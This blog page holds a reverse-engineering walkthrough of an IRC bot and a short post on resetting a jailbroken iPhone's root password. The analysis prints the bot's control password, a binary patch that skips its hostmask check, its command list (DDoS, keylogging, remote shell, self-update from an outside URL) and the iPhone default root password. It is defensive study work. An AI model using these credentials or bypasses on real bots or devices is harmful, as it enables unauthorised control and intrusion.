As the malware has configured itself to start whenever Windows boots, it gets executed and tries to connect to its master. This time its DNS query gets resolved and it tries to connect to TCP port 6667, which happens to be the IRC port. Recall that I have already installed an IRC server on the BT3 machine. Let’s start the IRC service and restart the malware process from Process Explorer.

This time the malware connects to the IRC server and joins the channel named “Chalenge” with password “happy12”. Refer to the Wireshark trace screenshot. The malware then changes the channel mode to moderated and hidden using the mode -mnst channel control command, and changes the topic to “.asc vnc 100 0 0 -r -b”.
Now I can conclude that the malware is being controlled via an IRC channel. The question now arises: which type of, and what, services does the malware provide to its master? There are two ways to find this out:

  1. Code analysis via reverse engineering
  2. Controlling the malware by connecting to it.

I chose both ways simultaneously. I installed XChat2, an IRC client, and also joined the same channel. The unpacked strings output gave me some clues regarding the possible commands the malware might accept, like sysinfo, driveinfo, uptime, netinfo etc.
The malware didn’t respond when I tried sending these commands. There can again be two reasons behind such behaviour:

  • I am trying the wrong commands
  • The malware has authentication.

The second reason looks obvious, as why would the malware author allow any Tom, Dick and Harry to control his bot? So let’s find out the password for controlling the malware.
Let’s try to authenticate ourselves as the malware master. I decided to try password-like strings from the gathered strings output as potential passwords.

<bughira> .login admin123
-USA[XP]1123037- Are you a Fucker?. (bughira!BT@738FBBA.E0CB536.5CF86F75.IP).
-USA[XP]1123037- No pass for you.

To find the password, we will need to start looking into the binary code of the malware, as the password has to be hard-coded in it. OK, let’s start hunting for the string “No pass for you” in IDA Pro. IDA Pro is one of the most famous and best suited debuggers/disassemblers for malware analysis.
The code in the snapshot has a reference to the string “gemp123” which is being checked against our user input.

.text:004089BE ProcessCredentials:                             ; CODE XREF: sub_403EF2+6D2j
.text:004089BE                                         ; sub_403EF2+6E7j
.text:004089BE                 mov     esi, [ebp+esi+var_9C]
.text:004089C5                 cmp     esi, ebx
.text:004089C7                 mov     dword ptr [ebp+dwProcessId], esi
.text:004089CA                 jz      loc_404369
.text:004089D0                 cmp     [ebp+var_A8], ebx
.text:004089D6                 jnz     loc_404369
.text:004089DC                 push    offset asc_425B84 	; Use Delimiter "!"
.text:004089E1                 push    [ebp+var_A0]    		; Our Supplied Nick and Domain name.
.text:004089E7                 call    _strtok			; Separate NickName from the string.
.text:004089EC                 mov     esi, eax
.text:004089EE                 push    offset word_475DB4 	; char *
.text:004089F3                 push    ebx             		; char *
.text:004089F4                 inc     esi
.text:004089F5                 call    _strtok
.text:004089FA                 push    offset asc_423648 	; "~"
.text:004089FF                 push    eax             		; Push the domain name string to get exact domain name token
.text:00408A00                 call    _strtok
.text:00408A05                 push    dword ptr [ebp+PId] 	; Push our supplied password
.text:00408A08                 mov     edi, eax                 ; Store complete domain string in EDI for further usage if needed.
.text:00408A0A                 push    offset aGemp123 		; Password for the Malware : "gemp123"
.text:00408A0F                 call    _strcmp			; Compare supplied password with gemp123
.text:00408A14                 add     esp, 20h			; ReOrganize stack
.text:00408A17                 test    eax, eax			; Check the return value of strcmp
.text:00408A19                 jz      short loc_408A66		; If Zero,Login Successful
.text:00408A1B                 lea     eax, [ebp+var_C8] 	; Login Failed. Insult Connected user.
.text:00408A21                 push    edi			; Push our Domain name
.text:00408A22                 push    eax			; Push Our nick Name
.text:00408A23                 lea     eax, [ebp+var_C8]        ;
.text:00408A29                 push    eax             		; Push Malware Bot name
.text:00408A2A                 push    offset WrnPassMsg 	; "NOTICE %s :Are you a Fucker?. (%s!%s).\r"...
.text:00408A2F                 push    [ebp+arg_4]     		;  Socket Descriptor
.text:00408A32                 call    SendMessage		; Send Message over socket.
.text:00408A37                 lea     eax, [ebp+var_C8]
.text:00408A3D                 push    eax             		; Push Malware Bot name.
.text:00408A3E                 push    offset WrnPassMesg1	; "NOTICE %s :No pass for you.\r\n"
.text:00408A43                 push    [ebp+arg_4]     		; Socket Descriptor
.text:00408A46                 call    SendMessage		; Send message over a socket
.text:00408A4B                 push    edi			; Push Domain name and other information for
.text:00408A4C                 push    esi			; logging purpose.
.text:00408A4D                 push    offset aRealmbotIrc_35 	; "RealmBoT (irc.p.l.g) .++.  *Failed pass"...

Let's try “gemp123” as the password.

<bughira> .login gemp123
-USA[XP]2866523- WTF!? no yet fucker!. (bughira!BT@738FBBA.E0CB536.5CF86F75.IP).
-USA[XP]2866523- Orders: No Talk with you.

It looks like the password is correct, but the malware does not like something else, perhaps my nickname. Let's dig further under the debugger.
Again I searched IDA for the string “WTF!? no yet fucker!.” and pulled up all its references. Working back through the code, I found a function that checks my nick!user@host against the mask “*@legalize.it”. So the malware accepts a master only from the legalize.it domain; the nickname can be anything. A password plus a hostmask check is a common way for IRC bots to tie control to one operator, but the hostmask is only a string the IRC server reports in the message prefix, so it is no stronger than that server.
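To make the control flow of the disassembly above concrete, here is a C reconstruction of the .login decision. This is an added example, not the bot's code (which was only seen in disassembly): it splits the sender's nick!user@host prefix the way the strtok calls do, compares the password with strcmp, then tests the user@host part against the *@legalize.it mask. The wildcard matcher, the function and constant names, and the accept_any_host switch, which reproduces what removing the hostmask check from the binary does, are my assumptions; the password and the mask are the strings found in the binary.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constants taken from the post: the bot password found next to the
 * strcmp, and the hostmask the bot compares the sender against. */
#define BOT_PASSWORD "gemp123"
#define MASTER_MASK  "*@legalize.it"

enum login_result {
    LOGIN_OK,            /* "[REALMBOT] : Thank for trying." */
    LOGIN_BAD_PASSWORD,  /* "No pass for you." */
    LOGIN_BAD_HOST,      /* "WTF!? no yet fucker!." */
    LOGIN_MALFORMED      /* prefix is not nick!user@host */
};

/* IRC-style wildcard match: '*' matches any run of characters, '?' one
 * character, everything else must match literally. Hypothetical helper;
 * the bot's own matcher was not reversed in the post. */
static bool mask_match(const char *pat, const char *s)
{
    while (*pat) {
        if (*pat == '*') {
            while (*pat == '*')
                pat++;
            if (*pat == '\0')
                return true;
            for (; *s; s++)
                if (mask_match(pat, s))
                    return true;
            return false;
        }
        if (*s == '\0' || (*pat != '?' && *pat != *s))
            return false;
        pat++;
        s++;
    }
    return *s == '\0';
}

/* Split "nick!user@host" the way the bot's strtok calls do: cut at '!'
 * and drop a leading '~' from the ident. Modifies buf in place. */
static bool split_prefix(char *buf, char **nick, char **userhost)
{
    char *bang = strchr(buf, '!');
    if (bang == NULL)
        return false;
    *bang = '\0';
    *nick = buf;
    *userhost = bang + 1;
    if (**userhost == '~')
        (*userhost)++;
    return strchr(*userhost, '@') != NULL;
}

/* The .login decision: password first, then the sender's hostmask.
 * accept_any_host reproduces the effect of the binary patch described
 * in the post (the hostmask check is skipped). */
enum login_result bot_login(const char *prefix, const char *password,
                            bool accept_any_host)
{
    char buf[256];
    char *nick, *userhost;

    if (prefix == NULL || password == NULL || strlen(prefix) >= sizeof buf)
        return LOGIN_MALFORMED;
    strcpy(buf, prefix);
    if (!split_prefix(buf, &nick, &userhost))
        return LOGIN_MALFORMED;
    if (strcmp(password, BOT_PASSWORD) != 0)
        return LOGIN_BAD_PASSWORD;
    if (!accept_any_host && !mask_match(MASTER_MASK, userhost))
        return LOGIN_BAD_HOST;
    (void)nick;  /* any nickname is accepted once the host matches */
    return LOGIN_OK;
}

int main(void)
{
    /* Constructed inputs mirroring the session in the post. */
    const char *me = "bughira!BT@738FBBA.E0CB536.5CF86F75.IP";
    const char *owner = "anynick!op@legalize.it";

    printf("unpatched, wrong pass : %d\n", bot_login(me, "letmein", false));
    printf("unpatched, right pass : %d\n", bot_login(me, "gemp123", false));
    printf("patched,   right pass : %d\n", bot_login(me, "gemp123", true));
    printf("owner host, right pass: %d\n", bot_login(owner, "gemp123", false));
    return 0;
}
```

Two things worth noticing: the password is checked before the host, which is exactly why the session above got as far as “WTF!? no yet fucker!” instead of “No pass for you”; and the host part is whatever the IRC server puts in the message prefix, so this second factor is only as trustworthy as the server and the network between the bot and it. Patching the binary is simply the most direct way around it when you are the one running the sample.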

I decided to patch the malware binary so that it accepts the login from any domain. Refer to the screenshot where the actual patching is done.

[screenshot: patching1]

I saved the binary under the same name, restarted the Winsec32.exe process, and this is what I got:
.login gemp123
[REALMBOT] : Thank for trying.

Bingo!!! We are in. Let's explore the malware's functionality by trying the earlier commands. Refer to the screenshots for the output of the commands tried.

[screenshot: commands]

Searching through the binary's strings and code helped me work out the malware's different functions. I was able to confirm that the malware can perform several DoS and DDoS attacks.

When you ask the malware to start its web server, you get output like the following screenshot. Similarly, the malware can start an FTP server on the victim machine, letting its master use the disk for storage.

[screenshot: webserver]

The malware is also capable of exploiting DCOM and VNC vulnerabilities on unpatched systems. Some of the commands supported by the malware:

        login                  Authentication (login password)
        logout
        chghttp                Change HTTP settings
        lockdown.off           Disables 'secure' mode visit irc.v
        web.off                Disable httpd
        ftpd.off               Disable ftpd
        log.off                Disable logging
        proxy.redirect.off     Disable TCP redirector
        ddos.off               Disable all DDoS attacks
        syn.off                Disable SYN flood
        udp.off                Disable UDP flood
        ping.off               Disable ping flood
        proc.off               List processes (?)
        clone.off              Kills clone
        clone                  Creates a clone of self
        secure.stop            Terminates thread processes
        scanstop               Stop port scan thread
        id                     Returns PID of its own process
        status                 Sends status information
        reboot                 As the name suggests, reboots the host machine
        clearlog               Clears the maintained log file
        opencmd                Open a command shell
        closecmd               Closes a command shell
        flusharp               Flushes the ARP cache
        flushdns               Flushes the DNS cache
        prockillid             Kills a process by PID
        readfile               Read a specific file from disk
        keylog.on              Start keylogging thread
        update                 Updates itself from http://www.Nivdav.net/Winsec32.exe
        execute                Execute specified command on remote system
        udpflood               Start UDP flood DoS module
        pingflood              Start ping flood DoS module
        advscan                Start port and service scan thread
        ftp.upload             Upload file using FTP

The malware also scanned random hosts for the VNC service (TCP port 5900). The target addresses were derived from my network configuration: all of them fall in the 192.168.0.0/16 range with the last two octets randomised. Here are some of the addresses contacted.

		192.168.209.95:5900
		192.168.155.129:5900
		192.168.1.19:5900
		192.168.105.160:5900
		192.168.206.49:5900
		192.168.52.194:5900
		192.168.153.83:5900
		192.168.1.225:5900
		192.168.103.113:5900
		192.168.204.2:5900

Static binary analysis in IDA Pro revealed more about the malware:

  • When the malware copies itself into %SYSTEMROOT%, it sets the READONLY, SYSTEM and HIDDEN attributes on the file, so Explorer does not show it by default.
  • The malware ensures that only a single copy of itself runs by creating a mutex at startup.
  • The malware first checks whether the host has an internet connection or an attached network.
  • The malware tries to exploit SMB shares.

Looking at the supported command list, we can classify this malware as an IRC bot capable of DoS and DDoS attacks, with keylogging and credential stealing as sub-categories.
I will conclude the second installment here. The last and final part of this series will cover generating a signature for the malware and code snippets of a removal tool. Hope to see you soon.

References:

  1. Analyzing IRCBOTS: Part I (Static and Behavioural Analysis)
  2. Analyzing IRCBOTS: Part III (Removal Tool and Signature Generation)
  3. IDA Pro
  4. OllyDbg
29 Jan 2010

How to RESET iPhone/iTouch R00t Passwd.

Author: bughira | Filed under: iPhone

Hmmmm, so you unlocked your new 1.1.4 iPhone and started playing around with various applications. Have you ever installed OpenSSH (usually there is no need to install it manually; most jailbreaking tools install it for you), logged in from a remote machine, tried to change the default root password with the regular ‘passwd’ command, and had the underlying BSD subsystem crash? Changing that password matters: every jailbroken iPhone ships with the same root password (“alpine”), so once OpenSSH is listening, anyone who can reach the phone over the network can log in.

The same thing happened to me recently. After changing the root password I happily closed the SSH connection and started browsing and making calls. I changed the SummerBoard theme and restarted SpringBoard to apply the change; that was it: my iPhone went into an endless loop and never let me open any application. It restored my cool wallpaper to the original one (earth) and looked like this:
If the same thing has happened to you, read on; if not, read on anyway ;)
There is a bug in the password-hashing (“encryption”) logic of the ‘passwd’ command that rewrites the /etc/master.passwd file, and the only way to recover from the resulting crash is to restore the iPhone.

Format of a sample /etc/master.passwd file (fields are user:hash:uid:gid:class:change:expire:gecos:home:shell):
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by lookupd. By default,
# lookupd gets information from NetInfo, so this file will not be consulted
# unless you have changed lookupd's configuration.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
root:someJunkChars:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:someJunkChars:501:501::0:0:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
unknown:*:99:99::0:0:Unknown User:/var/empty:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/false


How to change the default r00t password?
====================================
Instead of the ‘passwd’ command, use the following manual steps.

1) On a terminal (any machine with Perl or OpenSSL will do, not necessarily the iPhone), generate the crypt(3) hash of the new password in either of the following ways.

root@iBughira:~# perl -e 'print crypt("myPasswd", "XX")."\n"'
OR
root@iBughira:~# openssl passwd -salt "XX" "myPasswd"
XXd3otv/H89.E
root@iBughira:~# openssl passwd -salt "XX" "myPasswd123"
Warning: truncating password to 8 characters
XXd3otv/H89.E
root@iBughira:~#

Where the password must be <= 8 characters (traditional DES crypt ignores everything after the eighth character, which is why “myPasswd123” hashes to the same value as “myPasswd”) and XX is the 2-character salt. Use a random salt of your own rather than copying “XX”.
An online crypt password generator works too, but it hands your new password to a third party.
2) Copy the output of the command.
3) Log in to your iPhone over SSH.
4) Make a backup copy of /etc/master.passwd, then open it in the vi or nano editor.
5) Replace the string after root: (the second colon-separated field, i.e. “someJunkChars” in the sample file above) with the hash from step 1. Change nothing else on the line; it must keep all ten fields.
6) Save and exit the editor.
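As an added example of my own (not from the original post), here is a small C program that performs step 5 programmatically and checks what the manual edit leaves to the eye: that the new value is a well-formed 13-character DES crypt hash, that the entry keeps its ten colon-separated fields, and that the chosen password does not exceed the eight characters DES crypt actually uses. The sample file content, the function names and the g_rewritten buffer are my own constructions; the hash XXd3otv/H89.E is the one the post generates for “myPasswd” with salt “XX”.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample in the layout of the post's /etc/master.passwd
 * (comment block trimmed; the hashes are placeholders, not real ones). */
static const char SAMPLE_MASTER_PASSWD[] =
    "##\n"
    "# User Database\n"
    "##\n"
    "nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false\n"
    "root:someJunkChars:0:0::0:0:System Administrator:/var/root:/bin/sh\n"
    "mobile:someJunkChars:501:501::0:0:Mobile User:/var/mobile:/bin/sh\n";

/* Output buffer for the stand-alone demo below. */
static char g_rewritten[1024];

/* Traditional DES crypt(3) hashes, which `openssl passwd -salt XX` and
 * perl's crypt() produce, are exactly 13 characters from [./0-9A-Za-z],
 * the first two being the salt. */
bool is_des_crypt_hash(const char *h)
{
    static const char alphabet[] =
        "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    return strlen(h) == 13 && strspn(h, alphabet) == 13;
}

/* DES crypt only looks at the first 8 characters, as the openssl warning
 * in the post shows; anything longer adds no strength. */
bool password_fits_des_crypt(const char *pw)
{
    return strlen(pw) <= 8;
}

static int count_colons(const char *s, size_t n)
{
    int c = 0;
    for (size_t i = 0; i < n; i++)
        if (s[i] == ':')
            c++;
    return c;
}

/* Replace the second field (the hash) of `user`'s entry in the
 * master.passwd text `in`, writing the whole file to `out`.
 * Returns 1 if the entry was rewritten, 0 if there is no such user,
 * -1 for a bad hash, a malformed entry or a too-small output buffer. */
int set_password_hash(const char *in, const char *user, const char *hash,
                      char *out, size_t outsz)
{
    size_t ulen = strlen(user), hlen = strlen(hash), used = 0;
    int found = 0;
    const char *p = in;

    if (!is_des_crypt_hash(hash))
        return -1;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t linelen = nl ? (size_t)(nl - p) + 1 : strlen(p);

        if (linelen > ulen && strncmp(p, user, ulen) == 0 && p[ulen] == ':') {
            /* user:hash:uid:gid:class:change:expire:gecos:home:shell */
            const char *f2 = p + ulen + 1;
            const char *f2end = memchr(f2, ':', linelen - ulen - 1);
            if (f2end == NULL || count_colons(p, linelen) != 9)
                return -1;
            size_t restlen = (size_t)((p + linelen) - f2end);
            if (used + ulen + 1 + hlen + restlen >= outsz)
                return -1;
            memcpy(out + used, p, ulen + 1);    used += ulen + 1;
            memcpy(out + used, hash, hlen);     used += hlen;
            memcpy(out + used, f2end, restlen); used += restlen;
            found = 1;
        } else {
            if (used + linelen >= outsz)
                return -1;
            memcpy(out + used, p, linelen);
            used += linelen;
        }
        p += linelen;
    }
    out[used] = '\0';
    return found;
}

/* Stand-alone demo: set root's hash to the value the post generates
 * for "myPasswd" with salt "XX". */
int rewrite_root_demo(void)
{
    return set_password_hash(SAMPLE_MASTER_PASSWD, "root", "XXd3otv/H89.E",
                             g_rewritten, sizeof g_rewritten);
}

int main(void)
{
    if (rewrite_root_demo() == 1)
        fputs(g_rewritten, stdout);
    else
        fputs("rewrite failed\n", stderr);
    return 0;
}
```

Run it against a copy of /etc/master.passwd rather than the live file (read the file into a buffer, write the output to a new file, diff the two, then move it into place), and keep the backup from step 4 until you have confirmed the new password from a second SSH session. It is a guard against typos in the edit, not a substitute for that test.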

That's it, you are done: the root password has been changed. Verify it by logging in from a second SSH session before closing the one you edited the file in. If this helped you, do leave a comment or feedback.
